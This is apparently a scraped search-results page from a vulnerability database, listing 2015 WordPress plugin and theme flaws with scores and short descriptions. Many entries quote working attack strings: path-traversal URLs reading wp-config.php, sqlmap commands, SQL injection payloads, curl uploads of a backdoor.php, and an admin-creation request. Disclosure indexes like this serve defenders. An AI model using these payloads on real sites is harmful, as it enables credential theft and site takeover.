Lucene search
K
WpexploitRecent

4359 matches found

wpexploit
wpexploit
added 2015/06/10 12:0 a.m.23 views

RobotCPA Plugin V5 - Unauthenticated Local File Inclusion

The robotcpa WordPress plugin was affected by an Unauthenticated Local File Inclusion security vulnerability. This issue has been seen exploited in the wild with the following payload: http://www.example.com/wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php...

5CVSS0.9AI score0.12574EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/06/08 12:0 a.m.24 views

Easy2Map Photos <= 1.0.9 - SQL Injection

The code in Functions.php is vulnerable to SQL Injection because they are not parameterising or sanitising user input. sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2mimgsavemapname" --cookie=COOKIEHERE --level=5 --risk=3...

7.5CVSS2AI score0.02212EPSS
Exploits4References2
wpexploit
wpexploit
added 2015/06/08 12:0 a.m.21 views

Easy2Map <= 1.24 - SQL Injection

The Function.php file uses sprintf to format queries being sent to the database, this doesn't provide proper sanitisation of user input or properly parameterises the query. $ sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php'...

7.5CVSS2.3AI score0.105EPSS
Exploits5References3
wpexploit
wpexploit
added 2015/06/06 12:0 a.m.20 views

SE HTML5 Album Audio Player <= 1.1.0 - Local File Include

The se-html5-album-audio-player v1.1.0 plugin for wordpress has a local file include vulnerability. The downloadaudio.php file does not check to see if the user is authenticated, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../...

5CVSS1.3AI score0.18958EPSS
Exploits4References4
wpexploit
wpexploit
added 2015/06/02 12:0 a.m.16 views

Simple Share Buttons Adder <= 6.0.0 - Reflected Cross-Site Scripting (XSS)

A reflected XSS in "Simple Share Buttons Adder" before version 6.0.1 lead to a reflected cross-site scripting vulnerability on all pages where the "Simple Share Buttons Adder" was added usually all blog posts. Exploitation required that the browser did not encode the parameters sent to the server...

4.3CVSS0.5AI score0.00958EPSS
Exploits1References1
wpexploit
wpexploit
added 2015/05/25 12:0 a.m.15 views

Anti-Malware & Brute-Force Security by ELI <= 4.15.22 - Stored XSS

The Anti-Malware and Brute-Force Security by ELI has two issues which we will cover in this report. The first is that no nonce CSRF token is utilized on the settings screen. This could potentially result in resource utilization by performing a large number of scans simultaneously, should an...

6.4AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/25 12:0 a.m.16 views

NextScripts: Social Networks Auto-Poster < 3.4.18 - CSRF to Stored XSS

The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of Cross-Site Request Forgery token nonce. If a page with the following FORM in is visited by an administrative...

0.2AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/21 12:0 a.m.10 views

Simple Photo Gallery 1.7.8 - Blind SQL Injection

MySQL = 5.0.12 AND time-based blind SELECT sql injection in the galleryid parameter. ./sqlmap.py --dbms=MYSQL --technique T -u http://www.example.com/wordpress/index.php/wppgphotogallery/wppgphotodetails/?galleryid=1&imageid=14...

1.5AI score
Exploits0
wpexploit
wpexploit
added 2015/05/15 12:0 a.m.15 views

My Calendar <= 2.3.29 - Arbitrary File Override & Reflected XSS

The file override vulnerability allows an admin to override any file on the web server, ignoring settings such as DISALLOWFILEEDIT. Arbitrary File Override ----------------------- POST http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-styles Post Data: wpnonceavalidnonce...

0.4AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/15 12:0 a.m.13 views

Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS

The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a Multiple Reflected XSS security vulnerability. http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLSmsg=xsstestalert1...

0.8AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/15 12:0 a.m.14 views

Visual Form Builder <= 2.8.2 - SQL Injection & Reflected XSS

The Visual Form Builder WordPress plugin was affected by a SQL Injection & Reflected XSS security vulnerability. SQL Injection ------------- http://www.example.com/wp-admin/admin.php?page=visual-form-builder&form-filter=1+or+1%3D2...

0.6AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/14 12:0 a.m.27 views

Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)

The jQuery prettyPhoto library bundled with many plugins was found to be vulnerable to DOM Cross-Site Scripting XSS. http://www.example.com/prettyPhotogallery/1,/...

1.4AI score
Exploits0References3
wpexploit
wpexploit
added 2015/05/13 12:0 a.m.18 views

Syndication Links <= 1.0.2 - DOM Cross-Site Scripting (XSS)

The Syndication Links WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/syndication-links/genericons/example.html...

4.3CVSS0.9AI score0.01011EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/05/13 12:0 a.m.15 views

Indieweb Post Kinds <= 1.3.1 - DOM Cross-Site Scripting (XSS)

The Post Kinds WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/indieweb-post-kinds/genericons/example.html...

4.3CVSS0.6AI score0.00934EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/05/13 12:0 a.m.15 views

Media File Manager Advanced <= 1.1.5 - Multiple Vulnerabilites

Media File Manager Advanced suffers from executing administrator actions by any authenticated user due to weak permissions checking. An attacker is able to delete/update posts, Creating/Removing/Listing Directories, Moving/Renaming/Deleting Files, Blind SQL Injection and Cross-Site Scripting. Pos...

0.8AI score
Exploits0References2
wpexploit
wpexploit
added 2015/05/12 12:0 a.m.16 views

Auberge Theme <= 1.4.4 - DOM Cross-Site Scripting (XSS)

The Auberge WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/themes/auberge/genericons/example.html...

4.3CVSS1.2AI score0.00907EPSS
Exploits1References1
wpexploit
wpexploit
added 2015/05/12 12:0 a.m.14 views

Modern Theme <= 1.4.1 - DOM Cross-Site Scripting (XSS)

The Modern WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/themes/modern/genericons/example.html...

4.3CVSS1AI score0.00907EPSS
Exploits1References1
wpexploit
wpexploit
added 2015/05/11 12:0 a.m.15 views

WordPress 4.1-4.2.1 - Unauthenticated Genericons Cross-Site Scripting (XSS)

Description WordPress 4.1.5 and 4.2.2 removes the Genericons example file which came bundled with the twentyfifteen theme which is vulnerable to DOM based Cross-Site Scripting XSS. http://www.example.com/wp-content/themes/twentyfifteen/genericons/example.html1...

6.7AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/08 12:0 a.m.8 views

Yet Another Related Posts Plugin (YARPP) 4.2.4 - CSRF / XSS / RCE

'Yet Another Related Posts Plugin' options can be updated with no token/nonce protection which an attacker may exploit via tricking website's administrator to enter a malformed page which will change YARPP options, and since some options allow html the attacker is able to inject malformed...

0.1AI score
Exploits0References3
wpexploit
wpexploit
added 2015/05/07 12:0 a.m.18 views

Amazon Product In a Post Plugin - SQL Injection

amazon-product-in-a-post.php - this plugin takes raw user values and uses it delete from the database. This query can be manipulated to perform SQL injection attacks. Line 40: $tempswe = $wpdb-query"DELETE FROM $wpdb-prefixamazoncache WHERE Cacheid ='$wp-queryvars'appip-cache-id'' LIMIT 1;"; sqlm...

Exploits0References1
wpexploit
wpexploit
added 2015/05/06 12:0 a.m.19 views

Freshmail for WordPress <= 1.5.8 - shortcode.php SQL Injection

There is a SQL Injection vulnerability available for collaborators or higher privileged users for webs with freshmail plugin installed. The SQL Injection is located in the attribute "id" of the inserted shortcode FMform id="N". The shortcode attribute "id" is not sanitized before inserting it in ...

6.5CVSS1AI score0.02172EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/05/06 12:0 a.m.54 views

Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS)

Genericons...

1.1AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/06 12:0 a.m.13 views

Freshmail for WordPress <= 1.5.8 - Unauthenticated SQL Injection

There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter fmformid. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: X-Requested-With: XMLHttpRequest ... Cookie: wordpressf30...

Exploits0References2
wpexploit
wpexploit
added 2015/05/06 12:0 a.m.15 views

Facebook Page Photo Gallery <= 2.0.9 - DOM Cross-Site Scripting (XSS)

The facebook-page-photo-gallery WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/prettyPhotormsg0d/2,/...

0.8AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/06 12:0 a.m.238 views

Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS)

Genericons...

4.3CVSS0.9AI score0.03803EPSS
Exploits3References3
wpexploit
wpexploit
added 2015/05/05 12:0 a.m.9 views

WordPress prettyPhoto <= 1.1 - DOM Cross-Site Scripting (XSS)

The WordPress prettyPhoto WordPress plugin was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/prettyPhotogallery/1,/...

0.7AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/04 12:0 a.m.17 views

Pie Register 2.0.14-2.0.15 - SQL Injection

User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘showdashwidget’ and ‘invitaioncode’ are provided to any page, by any user anonymous or otherwise. import requests,base64,re...

1.8AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/04 12:0 a.m.15 views

Pie Register 2.0.14-2.0.15 - Privilege Escalation

User input is not validated correctly when accepting a login request via the Pie Register plugin. It is possible to manipulate posted variables in order to login using an arbitrary User ID such as 1, for the default Administrative account. import requests target="http://localhost" payload =...

1.9AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/03 12:0 a.m.18 views

WeeklyNews Premium Theme <= 2.2 - Cross-Site Scripting (XSS)

Vendor confirmed fixed in as 2.2.9 although this issue was not mentioned in the changelog. http://www.example.com/?s=test"...

4.3CVSS0.7AI score0.00934EPSS
Exploits2References1
wpexploit
wpexploit
added 2015/04/29 12:0 a.m.40 views

White Label CMS <= 1.5.2 - Stored XSS

Due to a lack of CSRF protection, and lack of sanitation of user input, it is possible to trigger a Persistent XSS attack via a CSRF attack. This attack targets in particular the Import functionality, which is located in the 'wlcmsImport' function, within the file...

0.3AI score
Exploits0References1
wpexploit
wpexploit
added 2015/04/28 12:0 a.m.21 views

rtMedia for WordPress, BuddyPress & bbPress 3.7.39 - SQL Injection

When initialized, the rtMedia will include and instantiate certain classes if BuddyPress is installed. One of these classes is RTMediaActivityUpgrade, contained within the file ‘app/importers/RTMediaActivityUpgrade.php’. This class is instantiated in the file ‘admin/RTMediaAdmin.php,’ line 110, i...

1.3AI score
Exploits0References1
wpexploit
wpexploit
added 2015/04/26 12:0 a.m.16 views

Exquisite Ultimate Newspaper Theme <= 1.3.3 - DOM Cross-Site Scripting (XSS)

The exquisite-wp WordPress theme was affected by a DOM Cross-Site Scripting XSS security vulnerability. http://www.example.com/...

4.3CVSS1.4AI score0.01078EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/04/24 12:0 a.m.10 views

Premium SEO Pack 1.8.0 - Unauthenicated Arbitrary File Upload & LFD

This plugin is vulnerable to Local File Disclosure and Remote Code Execute via Arbitrary File Upload. BASE64 ENCODED SHELL...

0.7AI score
Exploits0References3
wpexploit
wpexploit
added 2015/04/23 12:0 a.m.9 views

Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection

Unauthenticated SQL injection in parameter "SingleProduct" when a web visitor explores a product published by the web administrator. This exploit needs magicquotesgpc turned off in the destination server. File Functions/Shortcodes.php line 779 http:///?SingleProduct=2'+and+'a'='a...

1.3AI score
Exploits0References3
wpexploit
wpexploit
added 2015/04/23 12:0 a.m.13 views

Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection

Unauthenticated SQL injection in ajax call when the plugin is counting the times a product is being seen by the web visitors. The vulnerable POST parameter is "ItemID". Vulnerable code: In file Functions/ProcessAjax.php line 67: ... $ItemID = $POST'ItemID'; $Item = $wpdb-getrow"SELECT ItemViews...

2.2AI score
Exploits0References1
wpexploit
wpexploit
added 2015/04/22 12:0 a.m.21 views

Ultimate Product Catalogue <= 3.1.1 - Unauthenticated File Upload

By sending a specially-crafted HTTP POST request, a remote unauthenticated attacker can exploit this issue to upload arbitrary file and execute it in the context of the web server process. curl -v -k -X POST -F "ProductsSpreadsheet=@./backdoor.php"...

2AI score
Exploits0References2
wpexploit
wpexploit
added 2015/04/20 12:0 a.m.18 views

Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement

The Crayon Syntax Highlighter plugin allows access to the AJAX method 'crayon-theme-editor-save' to any registered user. When called, the AJAX method ‘crayon-theme-editor-save’ will call the 'save' function within the CrayonThemeEditorWP class, defined in...

1AI score
Exploits0References1
wpexploit
wpexploit
added 2015/04/17 12:0 a.m.16 views

Mashshare <= 2.3.0 - Information Disclosure

The Mashshare plugin exposes a few AJAX commands via its own custom hook, which can be found in the file ‘includes/admin/admin-actions.php’, and the function ‘mashsbprocessactions’. This function is called upon the ‘admininit’ action being fired, which can be triggered by anyone when visiting the...

0.2AI score
Exploits0References2
wpexploit
wpexploit
added 2015/04/16 12:0 a.m.13 views

WP-Mon - Arbitrary File Download

The wp-mon WordPress plugin was affected by an Arbitrary File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php...

1.4AI score
Exploits0References1
wpexploit
wpexploit
added 2015/04/15 12:0 a.m.7 views

Ajax Store Locator <= 1.2 - Remote SQL Injection

The ajax-store-locator WordPress plugin was affected by a Remote SQL Injection security vulnerability. http://www.example.com/wordpress/wp-admin/admin-ajax.php?action=sldalsearchlocation&funMethod=SearchStore&Location=Social&StoreLocation=11 AND SELECT FROM SELECTSLEEP10LCKZ...

1.8AI score
Exploits0References3
wpexploit
wpexploit
added 2015/04/14 12:0 a.m.19 views

Crayon Syntax Highlighter <= 2.6.10 - Local File Disclosure

The local file syntax highlighting feature of Crayon Syntax Highlighter doesn't check the path of the file to process. Also, by default, this feature is usable through public comments. This allows unauthenticated visitors to see the content of any file where the web server has read permissions,...

7.2AI score
Exploits0References1
wpexploit
wpexploit
added 2015/04/14 12:0 a.m.16 views

Tune Library <= 1.5.4 - SQL Injection

The Tune Library WordPress plugin was affected by a SQL Injection security vulnerability. http://www.example.com/?pageid=2&artistletter=G' UNION ALL SELECT CONCATWSCHAR59,version,currentuser,database,2--%20...

6.8CVSS1.3AI score0.04868EPSS
Exploits6References4
wpexploit
wpexploit
added 2015/04/13 12:0 a.m.16 views

WP Mobile Edition <= 2.2.7 - Remote File Disclosure

The plugin is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php' http://www.example.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php...

1.5AI score
Exploits0References1
wpexploit
wpexploit
added 2015/04/13 12:0 a.m.9 views

WordPress Video Gallery <= 2.8 - SQL Injection

Note: The vendor patched the issue but did not change the version number. Using fixed in version 2.8.1 for detection reasons although in reality this version does not exist at the time of writing. http://www.example.com/wp-admin/admin-ajax.php?action=googleadsense&vid=SQLi...

2.4AI score
Exploits0References3
wpexploit
wpexploit
added 2015/04/12 12:0 a.m.14 views

N-Media Website Contact Form with File Upload <= 1.3.4 - Arbitrary File Upload

The "uploadfile" ajax function is affected from unrestricted file upload vulnerability. curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nmwebcontactuploadfile" http://www.example.com/wp-admin/admin-ajax.php Response:...

1.1AI score
Exploits0References4
wpexploit
wpexploit
added 2015/04/10 12:0 a.m.17 views

Fusion Engage 1.0.5 - Local File Disclosure

The fusion-engage WordPress plugin was affected by a Local File Disclosure security vulnerability. curl --data "action=fegetsvhtml&video=../wp-config.php" "http://www.example.com/wp-admin/admin-ajax.php";...

0.3AI score
Exploits0References2
wpexploit
wpexploit
added 2015/04/10 12:0 a.m.9 views

Duplicator <= 0.5.14 - SQL Injection & CSRF

An authorised user with "export" permission or a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin CSRF. http://www.example.com/wp-admin/admin-ajax.php?action=duplicatorpackagedelete PO...

2.9AI score
Exploits0References3
wpexploit
wpexploit
added 2015/04/07 12:0 a.m.21 views

All In One WP Security & Firewall <= 3.9.0 - Blind SQL Injection

There are some pages which use the WordPress escsql function incorrectly. http://www.example.com/wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=userid,select from selectsleep30a&order=asc...

7.5CVSS1.3AI score0.01869EPSS
Exploits1References3
wpexploit
wpexploit
added 2015/04/06 12:0 a.m.10 views

QAEngine Theme - Privilege Escalation

QAEngine vulnerability allows an attacker to have an administrator account on the target's website. http://www.example.com/wp-admin/admin-ajax.php?action=ae-sync-user&method=create&userlogin=xADMIN&userpass=xPASS&role=administrator...

3.6AI score
Exploits0References2
wpexploit
wpexploit
added 2015/03/31 12:0 a.m.8 views

SP Project & Document Manager <= 2.5.3 - Blind SQL Injection

The SP Project & Document Manager WordPress plugin was affected by a Blind SQL Injection security vulnerability. http://www.example.com/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=SQLi...

1.2AI score
Exploits0References1
Total number of security vulnerabilities4359